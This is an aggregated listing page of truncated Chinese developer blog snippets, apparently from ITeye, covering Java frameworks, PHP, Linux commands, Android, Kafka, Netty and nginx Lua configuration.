1、在struts2的开发中，经常需要用户点击网页后就直接跳转到一个Action，执行Action里面的方法，利用mvc分层思想执行相应操作在界面上得到动态数据。毕竟用户不可能在地址栏里输入一个Action（不是专业人士） 2、＜jsp:forward page="xxx.action" /＞，这个标签可以实现跳转，page的路径是相对地址,不同与jsp和j
php 操作webservice实例 IT独行者 PHP webservice
首先大家要简单了解了何谓webservice，接下来就做两个非常简单的例子，webservice还是逃不开server端与client端。我测试的环境为：apache2.2.11 php5.2.10做这个测试之前，要确认你的php配置文件中已经将soap扩展打开，即extension=php_soap.dll; OK 现在我们来体验webservice //server端 serve
Windows下使用Vagrant安装linux系统 _wy_ windows vagrant
准备工作：下载安装 VirtualBox ：https://www.virtualbox.org/ 下载安装 Vagrant ：http://www.vagrantup.com/ 下载需要使用的 box ：官方提供的范例：http://files.vagrantup.com/precise32.box 还可以在 http://www.vagrantbox.es/
更改linux的文件拥有者及用户组(chown和chgrp) 无量 c linux chgrp chown
本文（转） http://blog.163.com/yanenshun@126/blog/static/128388169201203011157308/ http://ydlmlh.iteye.com/blog/1435157 一、基本使用：使用chown命令可以修改文件或目录所属的用户：命令
linux下抓包工具矮蛋蛋 linux
原文地址： http://blog.chinaunix.net/uid-23670869-id-2610683.html tcpdump -nn -vv -X udp port 8888 上面命令是抓取udp包、端口为8888 netstat -tln 命令是用来查看linux的端口使用情况 13 . 列出所有的网络连接 lsof -i 14. 列出所有tcp 网络连接信息 l
我觉得mybatis是垃圾！：“每一个用mybatis的男纸，你伤不起” alafqq mybatis
最近看了每一个用mybatis的男纸，你伤不起原文地址：http://www.iteye.com/topic/1073938 发表一下个人看法。欢迎大神拍砖；个人一直使用的是Ibatis框架，公司对其进行过小小的改良；最近换了公司，要使用新的框架。听说mybatis不错；就对其进行了部分的研究；发现多了一个mapper层；个人感觉就是个dao；
解决java数据交换之谜百合不是茶数据交换
交换两个数字的方法有以下三种，其中第一种最常用 /* 输出最小的一个数 */ public class jiaohuan1 { public static void main(String[] args) { int a =4; int b = 3; if(a<b){ // 第一种交换方式 int tmep =
渐变显示 bijian1013 JavaScript
<style type="text/css"> #wxf { FILTER: progid:DXImageTransform.Microsoft.Gradient(GradientType=0, StartColorStr=#ffffff, EndColorStr=#97FF98); height: 25px; } </style>
探索JUnit4扩展：断言语法assertThat bijian1013 java 单元测试 assertThat
一.概述 JUnit 设计的目的就是有效地抓住编程人员写代码的意图，然后快速检查他们的代码是否与他们的意图相匹配。 JUnit 发展至今，版本不停的翻新，但是所有版本都一致致力于解决一个问题，那就是如何发现编程人员的代码意图，并且如何使得编程人员更加容易地表达他们的代码意图。JUnit 4.4 也是为了如何能够
【Gson三】Gson解析{"data":{"IM":["MSN","QQ","Gtalk"]}} bit1129 gson
如何把如下简单的JSON字符串反序列化为Java的POJO对象? {"data":{"IM":["MSN","QQ","Gtalk"]}} 下面的POJO类Model无法完成正确的解析： import com.google.gson.Gson;
【Kafka九】Kafka High Level API vs. Low Level API bit1129 kafka
1. Kafka提供了两种Consumer API High Level Consumer API Low Level Consumer API(Kafka诡异的称之为Simple Consumer API，实际上非常复杂) 在选用哪种Consumer API时，首先要弄清楚这两种API的工作原理，能做什么不能做什么，能做的话怎么做的以及用的时候，有哪些可能的问题
在nginx中集成lua脚本：添加自定义Http头，封IP等 ronin47 nginx lua
Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言，从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器，但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站，我们不希望爬虫抓取子域名的页面，降低我们的Page rank。 location /{
java-归并排序 bylijinnan java
import java.util.Arrays; public class MergeSort { public static void main(String[] args) { int[] a={20,1,3,8,5,9,4,25}; mergeSort(a,0,a.length-1); System.out.println(Arrays.to
Netty源码学习-CompositeChannelBuffer bylijinnan java netty
CompositeChannelBuffer体现了Netty的“Transparent Zero Copy” 查看API（ http://docs.jboss.org/netty/3.2/api/org/jboss/netty/buffer/package-summary.html#package_description）可以看到，所谓“Transparent Zero Copy”是通
Android中给Activity添加返回键 hotsunshine Activity
// this need android:minSdkVersion="11" getActionBar().setDisplayHomeAsUpEnabled(true); @Override public boolean onOptionsItemSelected(MenuItem item) {
静态页面传参 ctrain 静态
$(document).ready(function () { var request = { QueryString : function (val) { var uri = window.location.search; var re = new RegExp("" + val + "=([^&?]*)", &
Windows中查找某个目录下的所有文件中包含某个字符串的命令 daizj windows 查找某个目录下的所有文件包含某个字符串
findstr可以完成这个工作。 [html] view plain copy >findstr /s /i "string" *.* 上面的命令表示，当前目录以及当前目录的所有子目录下的所有文件中查找"string&qu
改善程序代码质量的一些技巧 dcj3sjt126com 编程 PHP 重构
有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点，程序你只写一次，但以后会无数次的阅读。当你第二天回头来看你的代码时，你就要开始阅读它了。当你把代码拿给其他人看时，他必须阅读你的代码。因此，在编写时多花一点时间，你会在阅读它时节省大量的时间。让我们看一些基本的编程技巧：尽量保持方法简短尽管很多人都遵
SharedPreferences对数据的存储 dcj3sjt126com
SharedPreferences简介： &nbs
linux复习笔记之bash shell (2) bash基础 eksliang bash bash shell
转载请出自出处： http://eksliang.iteye.com/blog/2104329 1.影响显示结果的语系变量（locale） 1.1locale这个命令就是查看当前系统支持多少种语系，命令使用如下： [root@localhost shell]# locale LANG=en_US.UTF-8 LC_CTYPE="en_US.UTF-8"
Android零碎知识总结 gqdy365 android
1、CopyOnWriteArrayList add(E) 和remove(int index)都是对新的数组进行修改和新增。所以在多线程操作时不会出现java.util.ConcurrentModificationException错误。所以最后得出结论：CopyOnWriteArrayList适合使用在读操作远远大于写操作的场景里，比如缓存。发生修改时候做copy，新老版本分离，保证读的高
HoverTree.Model.ArticleSelect类的作用 hvt Web .net C#hovertree asp.net
ArticleSelect类在命名空间HoverTree.Model中可以认为是文章查询条件类，用于存放查询文章时的条件，例如HvtId就是文章的id。HvtIsShow就是文章的显示属性，当为-1是，该条件不产生作用，当为0时，查询不公开显示的文章，当为1时查询公开显示的文章。HvtIsHome则为是否在首页显示。HoverTree系统源码完全开放，开发环境为Visual Studio 2013
PHP 判断是否使用代理 PHP Proxy Detector 天梯梦 proxy
1. php 类 I found this class looking for something else actually but I remembered I needed some while ago something similar and I never found one. I'm sure it will help a lot of developers who try to
apache的math库中的回归——regression（翻译） lvdccyb Math apache
这个Math库，虽然不向weka那样专业的ML库，但是用户友好，易用。多元线性回归，协方差和相关性（皮尔逊和斯皮尔曼），分布测试（假设检验，t，卡方，G），统计。数学库中还包含，Cholesky，LU，SVD，QR，特征根分解，真不错。基本覆盖了：线代，统计，矩阵，最优化理论曲线拟合常微分方程遗传算法（GA），还有3维的运算。。。
基础数据结构和算法十三：Undirected Graphs (2) sunwinner Algorithm
Design pattern for graph processing. Since we consider a large number of graph-processing algorithms, our initial design goal is to decouple our implementations from the graph representation
云计算平台最重要的五项技术 sumapp 云计算云平台智城云
云计算平台最重要的五项技术 1、云服务器云服务器提供简单高效，处理能力可弹性伸缩的计算服务，支持国内领先的云计算技术和大规模分布存储技术，使您的系统更稳定、数据更安全、传输更快速、部署更灵活。特性机型丰富通过高性能服务器虚拟化为云服务器，提供丰富配置类型虚拟机，极大简化数据存储、数据库搭建、web服务器搭建等工作；仅需要几分钟，根据CP
《京东技术解密》有奖试读获奖名单公布 ITeye管理员活动
ITeye携手博文视点举办的12月技术图书有奖试读活动已圆满结束，非常感谢广大用户对本次活动的关注与参与。 12月试读活动回顾： http://webmaster.iteye.com/blog/2164754 本次技术图书试读活动获奖名单及相应作品如下：一等奖（两名） Microhardest：http://microhardest.ite